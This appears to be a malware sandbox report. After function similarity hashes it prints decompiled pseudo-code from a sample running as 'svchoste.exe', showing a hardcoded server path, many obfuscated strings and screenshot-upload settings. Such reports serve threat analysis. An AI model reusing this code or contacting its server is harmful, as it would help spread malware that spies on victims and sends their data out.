
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: __freea_memset$___ansicp___convertcp_strlen
String ID: ;4"B
API String ID: 2081051459-4273704327
Opcode ID: 557c6164bac63e718704b7153cb07c3996a52bdb1243da8d5141fca8cdbc1a38
Instruction ID: 9c5765a42d82643bf08772fa87b2c730a82ce29366d01ed5bfc9ff1c5225653d
Opcode Fuzzy Hash: 557c6164bac63e718704b7153cb07c3996a52bdb1243da8d5141fca8cdbc1a38
Instruction Fuzzy Hash: AC516877604140AFDB209FA4DD81BAC3BA9E748368F198926FF10C2654FB34CD959B80

Uniqueness

Uniqueness Score: -1.00%

Function 00960848, Relevance: 6.1, APIs: 4, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0096087C
__locking.LIBCMT ref: 00960891

Part of subcall function 009600C1: __getptd_noexit.LIBCMT ref: 009600C1

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: __fileno__getptd_noexit__locking
String ID:
API String ID: 630670418-0
Opcode ID: 5f6586de3a77ab4ae2f3ef30a3cdeb19f689b990701e185049751ee8bd416d7d
Instruction ID: 119a39475d1e0fbc631188b2e6b3b46159d9c48352d9bd92db00f3cc9fa619db
Opcode Fuzzy Hash: 5f6586de3a77ab4ae2f3ef30a3cdeb19f689b990701e185049751ee8bd416d7d
Instruction Fuzzy Hash: 7E515D73E04240AFE714CF74CAC175E3BA2E784358F258165DF51A768AD774AE90CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0095FBAA, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0095FC6E
__fileno.LIBCMT ref: 0095FC8E
__locking.LIBCMT ref: 0095FC95
__flsbuf.LIBCMT ref: 0095FCC0

Part of subcall function 009600C1: __getptd_noexit.LIBCMT ref: 009600C1

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: __fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 1291973410-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: ff1cc79c89cb628ea36216023c0061380698f584eddce5f2dd00899970bf41d6
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: BD41CF33A006009FE724DF7AD8A06AE7775E78037AB248534EFA147A44E774DE49CB00

Uniqueness

Uniqueness Score: -1.00%

Function 009675DB, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00967601

Part of subcall function 00967426: __fltout2.LIBCMT ref: 00967452

__cftog_l.LIBCMT ref: 00967627
__cftoe_l.LIBCMT ref: 00967659

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 90d52240494d36f38e80f32176194c82d968eccdeca229c714f5fac9a51901dd
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FF11487B00C880BACF205EB8CD05CAC7B27F35835C758A815F72849819FF35C9A2A382

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchoste.exe PID: 4648 Parent PID: 5860 svchoste.exeCOMMON

Execution Graph

Execution Coverage:	29.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	35.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Executed Functions

Function 00B93050, Relevance: 506.6, Strings: 404, Instructions: 1630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00B93050(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t2;
				intOrPtr _t26;
				intOrPtr _t179;
				intOrPtr _t212;
				intOrPtr _t250;
				intOrPtr _t362;
				intOrPtr _t376;
				intOrPtr _t405;
				void* _t406;
				void* _t408;
				void* _t409;
				void* _t815;

				_push(__ecx);
				_v8 = __ecx;
				 *0xba2354 = "056139954853430408";
				_push("pplonline.org/Cgi/");
				_pop(_t2);
				 *0xba26d8 = _t2;
				 *0xba21d0 = E00B92F70(_t406, _t408, _t409, _t815, "LQ==");
				 *0xba2608 = E00B92F70(_t406, _t408, _t409, _t815, "KaoQpEzKSjGm8Q==");
				 *0xba2600 = E00B92F70(_t406, _t408, _t409, _t815, "CaoQpEzKRGjzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0xba236c = E00B92F70(_t406, _t408, _t409, _t815, "DboNtEbQF3/+oFA=");
				 *0xba2494 = E00B92F70(_t406, _t408, _t409, _t815, "GLoX6gmCFw==");
				 *0xba2694 = E00B92F70(_t406, _t408, _t409, _t815, "D6AGohOHQTY=");
				 *0xba2550 = E00B92F70(_t406, _t408, _t409, _t815, "GbwOoFzTATf+y0KojtYSkaQ=");
				 *0xba214c = E00B92F70(_t406, _t408, _t409, _t815, "CaoQpEzKRAm/60SwiotXjvfNyQ==");
				 *0xba248c = E00B92F70(_t406, _t408, _t409, _t815, "F7JjuEDJAWWXwRnlzp8=");
				 *0xba21f8 = E00B92F70(_t406, _t408, _t409, _t815, "HYYqlBOHQTY=");
				 *0xba242c = E00B92F70(_t406, _t408, _t409, _t815, "HrwOsUDJRAu/6Eb/y8lB");
				 *0xba2508 = E00B92F70(_t406, _t408, _t409, _t815, "DbwRu07VCzCuvwPgmA==");
				 *0xba20a4 = E00B92F70(_t406, _t408, _t409, _t815, "EbYaskbGFiH+yUKrjJlT07KbgPCVZg==");
				 *0xba2564 = E00B92F70(_t406, _t408, _t409, _t815, "ErIRtF7GFiD+qA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0xba25c8 = E00B92F70(_t406, _t408, _t409, _t815, "CqEMs0zUFyqsvwPgmA==");
				 *0xba2558 = E00B92F70(_t406, _t408, _t409, _t815, "FrwEuUrGCGWu90ymjp9B26WbgPCVcQ==");
				 *0xba258c = E00B92F70(_t406, _t408, _t409, _t815, "DLoHtUbEBTe6vwPgmA==");
				 *0xba2104 = E00B92F70(_t406, _t408, _t409, _t815, "HroQoEXGHX/+oFA=");
				 *0xba21cc = E00B92F70(_t406, _t408, _t409, _t815, "CJIu6gmCFw==");
				 *0xba215c = E00B92F70(_t406, _t408, _t409, _t815, "FrITpEbXXmX79g==");
				 *0xba228c = E00B92F70(_t406, _t408, _t409, _t815, "DroOtQmKSWjzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0xba2374 = E00B92F70(_t406, _t408, _t409, _t815, "FrxjsUWdRGCt");
				 *0xba2310 = E00B92F70(_t406, _t408, _t409, _t815, "WrwNtROHQTY=");
				_t26 = E00B92F70(_t406, _t408, _t409, _t815, "FLYXp0bVD2XzqA7oxsEfmfrFl/2dONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng=="); // executed
				 *0xba2348 = _t26;
				 *0xba2198 = E00B92F70(_t406, _t408, _t409, _t815, "E4NZ8GD3Ww==");
				 *0xba2538 = E00B92F70(_t406, _t408, _t409, _t815, "GbwWvl3VHX/+xkywhZhAzeg=");
				 *0xba20d8 = E00B92F70(_t406, _t408, _t409, _t815, "E70QpEjLCCC6pXCqjZhFxraa3/CdONghOeYatRN8r22RvgdoQSz2oEl19dbLETI+8RVlqBE+g42Kng==");
				 *0xba23a0 = E00B92F70(_t406, _t408, _t409, _t815, "f6A/jAM=");
				 *0xba20a0 = E00B92F70(_t406, _t408, _t409, _t815, "dA==");
				 *0xba22bc = E00B92F70(_t406, _t408, _t409, _t815, "f6A/jAzU");
				 *0xba2170 = E00B92F70(_t406, _t408, _t409, _t815, "f6A=");
				 *0xba2570 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Is=");
				 *0xba2404 = E00B92F70(_t406, _t408, _t409, _t815, "dLYbtQ==");
				 *0xba2254 = E00B92F70(_t406, _t408, _t409, _t815, "YIkMvkyJLSG761esjYVXxg==");
				 *0xba26b8 = E00B92F70(_t406, _t408, _t409, _t815, "AYkMvkzzFiSw9kWgmbES7riG35nUKMc=");
				 *0xba2244 = E00B92F70(_t406, _t408, _t409, _t815, "f6BM4QfNFCI=");
				 *0xba2520 = E00B92F70(_t406, _t408, _t409, _t815, "f6BM4gfNFCI=");
				 *0xba252c = E00B92F70(_t406, _t408, _t409, _t815, "f6BM4wfNFCI=");
				 *0xba26e4 = E00B92F70(_t406, _t408, _t409, _t815, "f6BM5AfNFCI=");
				 *0xba259c = E00B92F70(_t406, _t408, _t409, _t815, "f6BM5QfNFCI=");
				 *0xba256c = E00B92F70(_t406, _t408, _t409, _t815, "f6BM5gfNFCI=");
				 *0xba2294 = E00B92F70(_t406, _t408, _t409, _t815, "f6BM5wfNFCI=");
				 *0xba2568 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iuby7zZYZA/Oq9b9A==");
				 *0xba22f0 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuOyLXVd5k/Oq9b9A==");
				 *0xba2398 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuF1arXeYBpOq9b9A==");
				 *0xba2458 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuFyabTZcQ4JOVT9FI=");
				 *0xba2440 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6IuGyaODO5FgeA==");
				 *0xba2618 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iub1bbEep5iJ+VT9FI=");
				 *0xba20f4 = E00B92F70(_t406, _t408, _t409, _t815, "Gek/jHnVCyKs5E6BiphT6Iue2aLFe4Flea4GrA5/5izQ");
				 *0xba26f4 = E00B92F70(_t406, _t408, _t409, _t815, "BfYQ/lPOFA==");
				 *0xba22e0 = E00B92F70(_t406, _t408, _t409, _t815, "Bo9jv0bMDSCt");
				 *0xba22c4 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8CpV3IAiyy6Q==");
				 *0xba26a0 = E00B92F70(_t406, _t408, _t409, _t815, "Bo9jsw==");
				 *0xba20e8 = E00B92F70(_t406, _t408, _t409, _t815, "PLoPtQ==");
				 *0xba22e8 = E00B92F70(_t406, _t408, _t409, _t815, "f6BMvUjOCmuu7VM=");
				 *0xba224c = E00B92F70(_t406, _t408, _t409, _t815, "G4MzlGjzJQ==");
				 *0xba21c4 = E00B92F70(_t406, _t408, _t409, _t815, "FpwgkWXmNBWaxHeE");
				 *0xba24ec = E00B92F70(_t406, _t408, _t409, _t815, "D4Amgnn1KwOXyWY=");
				 *0xba26cc = E00B92F70(_t406, _t408, _t409, _t815, "ELwLvm3IAQ==");
				 *0xba25d4 = E00B92F70(_t406, _t408, _t409, _t815, "EpIv6X3v");
				 *0xba24bc = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CV2u66U8=");
				 *0xba247c = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqx9Uar");
				 *0xba2140 = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqu90a1ip5X66Ha");
				 *0xba2408 = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxqt8Ua1");
				 *0xba23f0 = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJtwLKQzg==");
				 *0xba241c = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq47E2kh4VI0Q==");
				 *0xba25f4 = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96Uy2jg==");
				 *0xba250c = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJt1q6c36M=");
				 *0xba2650 = E00B92F70(_t406, _t408, _t409, _t815, "KaIPuV3CVxq96k+whoJt1ruH2A==");
				 *0xba21f0 = E00B92F70(_t406, _t408, _t409, _t815, "BvEMo3bEFjyu8X/n0ZdulrKG2aLJZYFpcJRc/UcNoHrgsQ==");
				 *0xba23bc = E00B92F70(_t406, _t408, _t409, _t815, "BvEe");
				 *0xba20d4 = E00B92F70(_t406, _t408, _t409, _t815, "CpI3mA==");
				 *0xba2690 = E00B92F70(_t406, _t408, _t409, _t815, "CpI3mBQ=");
				 *0xba22b8 = E00B92F70(_t406, _t408, _t409, _t815, "FIAwj2DJDTE=");
				 *0xba25a8 = E00B92F70(_t406, _t408, _t409, _t815, "FIAwj3rPETG66lSr");
				 *0xba21e4 = E00B92F70(_t406, _t408, _t409, _t815, "CphS4XbgATGX61egmYJT2JyNw4PceoE=");
				 *0xba2178 = E00B92F70(_t406, _t408, _t409, _t815, "CphS4XbhFiC71k+qnw==");
				 *0xba26d4 = E00B92F70(_t406, _t408, _t409, _t815, "CphS4XbmETG24E2xgo9TwLI=");
				 *0xba2338 = E00B92F70(_t406, _t408, _t409, _t815, "CphS4XrjNhqa4EC3kpxG");
				 *0xba2504 = E00B92F70(_t406, _t408, _t409, _t815, "LLIWvF3ECCzw4U+p");
				 *0xba22ec = E00B92F70(_t406, _t408, _t409, _t815, "DLIWvF3oFCCw00Kwh5g=");
				 *0xba24a0 = E00B92F70(_t406, _t408, _t409, _t815, "DLIWvF3kCCqt4HWknoBG");
				 *0xba24d4 = E00B92F70(_t406, _t408, _t409, _t815, "DLIWvF3iCjCz4FGkn4l7wLKFyQ==");
				 *0xba23a8 = E00B92F70(_t406, _t408, _t409, _t815, "DLIWvF3gATGX8Uao");
				 *0xba26ec = E00B92F70(_t406, _t408, _t409, _t815, "DLIWvF3hFiC7");
				 *0xba25d0 = E00B92F70(_t406, _t408, _t409, _t815, "KrIQo17IFiGtq1e9nw==");
				 *0xba2188 = E00B92F70(_t406, _t408, _t409, _t815, "O/g=");
				 *0xba264c = E00B92F70(_t406, _t408, _t409, _t815, "KA==");
				 *0xba23c8 = E00B92F70(_t406, _t408, _t409, _t815, "CoEslhOHMQuV");
				 *0xba239c = E00B92F70(_t406, _t408, _t409, _t815, "CoEslhOHQTY=");
				 *0xba23b8 = E00B92F70(_t406, _t408, _t409, _t815, "CZwlhBOHQTY=");
				 *0xba2258 = E00B92F70(_t406, _t408, _t409, _t815, "EpwwhBOHQTY=");
				 *0xba22b4 = E00B92F70(_t406, _t408, _t409, _t815, "D4AmghOHQTY=");
				 *0xba21a4 = E00B92F70(_t406, _t408, _t409, _t815, "CpIwgxOH");
				 *0xba26c4 = E00B92F70(_t406, _t408, _t409, _t815, "CpIwgxOHQTY=");
				 *0xba24c4 = E00B92F70(_t406, _t408, _t409, _t815, "f6A/jGTIHiyy6UKZt6pbxrKO1ajsSYV+e61e9FsirCnS+g==");
				 *0xba26f0 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8Pv07OCjbw71CqhQ==");
				 *0xba21b0 = E00B92F70(_t406, _t408, _t409, _t815, "PLwRvXrSBii38XaXpw==");
				 *0xba2394 = E00B92F70(_t406, _t408, _t409, _t815, "L6AGokfGCSCY7Eapjw==");
				 *0xba2548 = E00B92F70(_t406, _t408, _t409, _t815, "P71jolDXECC60FCgmYJT2bI=");
				 *0xba2544 = E00B92F70(_t406, _t408, _t409, _t815, "P71jolDXECC61UK2mJtdxrM=");
				 *0xba2664 = E00B92F70(_t406, _t408, _t409, _t815, "PaYKtA==");
				 *0xba2400 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8XtUTX");
				 *0xba220c = E00B92F70(_t406, _t408, _t409, _t815, "ObwMu0DCFxmCoFCazp8cwK+c");
				 *0xba21f4 = E00B92F70(_t406, _t408, _t409, _t815, "f6Bq9VquQTbXoFDMzp87kaThn6M=");
				 *0xba2138 = E00B92F70(_t406, _t408, _t409, _t815, "GZIxlBOHQTb+y2KIrtYSkaTI/pHkUM8sMbgYvU0=");
				 *0xba23e8 = E00B92F70(_t406, _t408, _t409, _t815, "ObA/jAzUO2Ctq1e9nw==");
				 *0xba21a8 = E00B92F70(_t406, _t408, _t409, _t815, "O6YXv0/OCCmC2Qa2tMlBmqOQzg==");
				 *0xba24f8 = E00B92F70(_t406, _t408, _t409, _t815, "f6Bq9Vo=");
				 *0xba2100 = E00B92F70(_t406, _t408, _t409, _t815, "CZYvlWrzRC2x9lfpy4VB/KOcyp/eeYwgNLtW7FZ9oinPwE8mGXO+oUQ9oIuPTmY//FYp6Fk/jtbG33g/9AmyJJTtkm82k33qs3jfLl0=");
				 *0xba2158 = E00B92F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCqs7ESshbNHxrvEmqXDcIdidaZSx0gw7jXZvwo1DXKo+gsqvKSQXXNmuRgO13NejszI1GQ0pw==");
				 *0xba23e4 = E00B92F70(_t406, _t408, _t409, _t815, "CZYvlWrzRA2R1neaoKlrmPeByY/YYYF8e6Vb4RJx8iHI+wZlBXKE/gE7rYmDED87uUA47E523f/Sx2515X/QW+n9zylh/S+z6CeCcx5wd5JwYcnj8E1jIXAdaf+hK7Oz19EyNRysSNA0qIZ8vwm0ByNx118=");
				 *0xba20b8 = E00B92F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCu/6EaahIJt17aa3vyQcI18fblW7Fc+7B/R/EQxBC376BwosYmHSHZ8smcx4F1hgoDE0n8+iyGVBruojV8pon33pWPCLkpoAfATDIfh700raGEsaeyqP7Q=");
				 *0xba2390 = E00B92F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCO34E+hhY1f0fvIzLHcYJAsUpl41R487Trj9UU3AWmy/hA3qoI=");
				 *0xba25f0 = E00B92F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCu/6Ebpy5pT2KKNmpbiWrgsdb5D91g47iw=");
				 *0xba2534 = E00B92F70(_t406, _t408, _t409, _t815, "DoE2lQ==");
				 *0xba21ec = E00B92F70(_t406, _t408, _t409, _t815, "HJIvg2w=");
				 *0xba2240 = E00B92F70(_t406, _t408, _t409, _t815, "dP0/jFnVCyO36Ua2xYVc3Q==");
				 *0xba24d0 = E00B92F70(_t406, _t408, _t409, _t815, "f6A/jAM=");
				 *0xba2488 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8vv0rGCGWN8UKxjg==");
				 *0xba22d0 = E00B92F70(_t406, _t408, _t409, _t815, "FrwEuUeHICSq5A==");
				 *0xba20e4 = E00B92F70(_t406, _t408, _t409, _t815, "GbwMu0DCFw==");
				 *0xba2154 = E00B92F70(_t406, _t408, _t409, _t815, "DbYB8G3GECQ=");
				 *0xba2474 = E00B92F70(_t406, _t408, _t409, _t815, "ObwMu0DCF2ut9E+sn4k=");
				 *0xba22f4 = E00B92F70(_t406, _t408, _t409, _t815, "NrwEuUfUSi+t6k0=");
				 *0xba20c8 = E00B92F70(_t406, _t408, _t409, _t815, "PLwRvUHOFzGx91rrmJ1e3aON");
				 *0xba2368 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8soEzVBWWN6kWxnI1A0Yu09aDVZ5QsR79W+lI03hw=");
				 *0xba2370 = E00B92F70(_t406, _t408, _t409, _t815, "FaMGokg=");
				 *0xba24f4 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8kv0bACCCC2WCtmYNf0Yu076PVZ9VIdb9W");
				 *0xba23f8 = E00B92F70(_t406, _t408, _t409, _t815, "HbwMt0XCRAa290yojg==");
				 *0xba25e4 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8guFvICSyr6H+Zvp9Xxves26TR");
				 *0xba2200 = E00B92F70(_t406, _t408, _t409, _t815, "GbsRv0TOESg=");
				 *0xba253c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8ov0TCECSC2Xa2jp4S8Lac2w==");
				 *0xba2288 = E00B92F70(_t406, _t408, _t409, _t815, "EbwOtV3G");
				 *0xba246c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8ivUDACxmC0FCgmcx21aOJ");
				 *0xba24b8 = E00B92F70(_t406, _t408, _t409, _t815, "G74Kt0Y=");
				 *0xba2670 = E00B92F70(_t406, _t408, _t409, _t815, "Bo83v1vEDBmC0FCgmcx21aOJ");
				 *0xba23fc = E00B92F70(_t406, _t408, _t409, _t815, "DrwRs0E=");
				 *0xba230c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8sokvOEDCz2X+QmIlAlJOJzrE=");
				 *0xba254c = E00B92F70(_t406, _t408, _t409, _t815, "FaEBuV3SCQ==");
				 *0xba2684 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8gv0TIZCqC2We3iotd2ou076PVZ9VIdb9W");
				 *0xba2640 = E00B92F70(_t406, _t408, _t409, _t815, "GbwOv03IRAGs5ESqhQ==");
				 *0xba2324 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8tuUrPFiqz4H+Zvp9Xxves26TR");
				 *0xba2268 = E00B92F70(_t406, _t408, _t409, _t815, "FLpjuFvICSA=");
				 *0xba2350 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8usVHTDCqwsH+Zvp9XxqQ=");
				 *0xba23c4 = E00B92F70(_t406, _t408, _t409, _t815, "F7IbpEHICnA=");
				 *0xba21bc = E00B92F70(_t406, _t408, _t409, _t815, "Bo8woFzTCiy12X+QmIlAlJOJzrE=");
				 *0xba20b4 = E00B92F70(_t406, _t408, _t409, _t815, "CaMWpEfODw==");
				 *0xba24dc = E00B92F70(_t406, _t408, _t409, _t815, "Bo8moEDERBWs7FWkiJUS9qWHzaPVZ6lQQbhS6h4V4zTd");
				 *0xba2598 = E00B92F70(_t406, _t408, _t409, _t815, "H4Mh");
				 *0xba2320 = E00B92F70(_t406, _t408, _t409, _t815, "Bo81uV/GCCG32X+QmIlAlJOJzrE=");
				 *0xba2410 = E00B92F70(_t406, _t408, _t409, _t815, "DLoVsUXDDQ==");
				 *0xba231c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8gv0rkCyaC2WG3hJtB0aW05oXDcIcsUKpD+Q==");
				 *0xba20fc = E00B92F70(_t406, _t408, _t409, _t815, "Gbxjk0bERAes6lS2jp4=");
				 *0xba223c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8Wk0bdKSC67EKZt7lA1bm05oXDcIcsUKpD+Q==");
				 *0xba240c = E00B92F70(_t406, _t408, _t409, _t815, "D6ECvgnlFiqp9ka3");
				 *0xba235c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8ymXmHNzCs43+Zvp9Xxves26TR");
				 *0xba24d8 = E00B92F70(_t406, _t408, _t409, _t815, "C5oz8HrSFiM=");
				 *0xba25b8 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8gtUfTJjex8lCgmbBu4aSNyPD0dIFt");
				 *0xba2638 = E00B92F70(_t406, _t408, _t409, _t815, "GbYNpA==");
				 *0xba2358 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8mvEzKASuq9gOHmYNFx7Ka5ozlZpB+NI9W7F8=");
				 *0xba2148 = E00B92F70(_t406, _t408, _t409, _t815, "H78GvUzJEDb+x1GqnJ9Xxg==");
				 *0xba260c = E00B92F70(_t406, _t408, _t409, _t815, "Bo83v1vlFiqC2XO3hIpb2LI=");
				 *0xba2660 = E00B92F70(_t406, _t408, _t409, _t815, "DrwRklvI");
				 *0xba2128 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8golDXECqK5EHlqZ5dw6SNyIzsQIZpZutz+Uow");
				 *0xba2168 = E00B92F70(_t406, _t408, _t409, _t815, "GaEaoF3IMCS8");
				 *0xba26e0 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8hokjRARax41eyip5X6IuqyLHGcNhOZqRA61sj3hzp4E83TEW6+QU=");
				 *0xba23d0 = E00B92F70(_t406, _t408, _t409, _t815, "GKECpkw=");
				 *0xba2260 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8uv1POCCm/2X+Dgp5X0riQ5ozgZ5pqfadS62IN");
				 *0xba2334 = E00B92F70(_t406, _t408, _t409, _t815, "F7wZuUXLBWWY7FGgjYNK");
				 *0xba251c = E00B92F70(_t406, _t408, _t409, _t815, "Bo8uv0bJBy236Uflu55d0KKLzrnfe4ZQSJtW9Ftxzy/T/XYZPHO06w00vYi6YA==");
				 *0xba20b0 = E00B92F70(_t406, _t408, _t409, _t815, "CrIPtQnqCyqw");
				 *0xba2444 = E00B92F70(_t406, _t408, _t409, _t815, "Bo80sV3CFiOx/X+Zu55d0r6E36PsSQ==");
				 *0xba23b4 = E00B92F70(_t406, _t408, _t409, _t815, "DbIXtVvBCz0=");
				 *0xba2284 = E00B92F70(_t406, _t408, _t409, _t815, "Bo9boEzEHDaq8EeshJ9u6JSR2LXCc5p0SJdn6lE36yzZ4HYZ");
				 *0xba22a8 = E00B92F70(_t406, _t408, _t409, _t815, "GaoBtVvBCz0=");
				_t179 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8tlX3gJRGbpXegiIRc27uH3bnVZqlQVqdW+1UZ4zfXz3YVHm695Ag9q6e6"); // executed
				 *0xba21c0 = _t179;
				 *0xba2514 = E00B92F70(_t406, _t408, _t409, _t815, "GL8Cs0LvBTK1");
				 *0xba2434 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8uv1POCCm/2X+siIlR1aO05oDCepNleK5ExGI=");
				 *0xba20f0 = E00B92F70(_t406, _t408, _t409, _t815, "E7AGk0jT");
				 *0xba2228 = E00B92F70(_t406, _t408, _t409, _t815, "Bo8o/WTCCCCx63+Z");
				 *0xba2208 = E00B92F70(_t406, _t408, _t409, _t815, "EZ4GvEzICg==");
				 *0xba23b0 = E00B92F70(_t406, _t408, _t409, _t815, "Bo83uFzJZCCs50q3j7Bu5KWH3LnccIZQSA==");
				 *0xba2248 = E00B92F70(_t406, _t408, _t409, _t815, "DrsWvk3CFie390c=");
				 *0xba21e0 = E00B92F70(_t406, _t408, _t409, _t815, "EpIxlH7mNkWC2WeAuK9g/Ye885/+SalfbbhD/VMN3gPZ/V43DW2L/ws7vYiVU21PgAg=");
				 *0xba2574 = E00B92F70(_t406, _t408, _t409, _t815, "CqEMs0zUFyqsy0Kojr9Gxr6G3Q==");
				 *0xba243c = E00B92F70(_t406, _t408, _t409, _t815, "MbYRvkzLV3fw4U+p");
				 *0xba21d4 = E00B92F70(_t406, _t408, _t409, _t815, "f7dDnWs=");
				 *0xba22d4 = E00B92F70(_t406, _t408, _t409, _t815, "D70I");
				 *0xba23d8 = E00B92F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3E=");
				 *0xba2480 = E00B92F70(_t406, _t408, _t409, _t815, "CqEMtFzEEAu/6EY=");
				 *0xba2164 = E00B92F70(_t406, _t408, _t409, _t815, "IuVX");
				 *0xba2120 = E00B92F70(_t406, _t408, _t409, _t815, "IutV");
				 *0xba2594 = E00B92F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsVod1ZL9Y/0ww8ijF");
				 *0xba2224 = E00B92F70(_t406, _t408, _t409, _t815, "F7JjuEDJAQKr7Ec=");
				 *0xba2220 = E00B92F70(_t406, _t408, _t409, _t815, "f7dM9U2IQSH+oEf/zogIkbM=");
				 *0xba2450 = E00B92F70(_t406, _t408, _t409, _t815, "f7c89U34QSGBoEeazohtkbM=");
				 *0xba24cc = E00B92F70(_t406, _t408, _t409, _t815, "D4cg9U0=");
				 *0xba20ec = E00B92F70(_t406, _t408, _t409, _t815, "HpowgGXmPQ==");
				 *0xba22a0 = E00B92F70(_t406, _t408, _t409, _t815, "f7cb9U0=");
				 *0xba244c = E00B92F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsQpxicKRA62INwTXO4U8rGFe+/xcxt5W6YEp9tVY78V1/wg==");
				 *0xba2678 = E00B92F70(_t406, _t408, _t409, _t815, "HroQoEXGHQu/6EY=");
				 *0xba2418 = E00B92F70(_t406, _t408, _t409, _t815, "HroQoEXGHRO791CshII=");
				 *0xba25ac = E00B92F70(_t406, _t408, _t409, _t815, "f6BGtA==");
				 *0xba20d0 = L"image/jpeg";
				 *0xba22ac = L"screenshot.jpg";
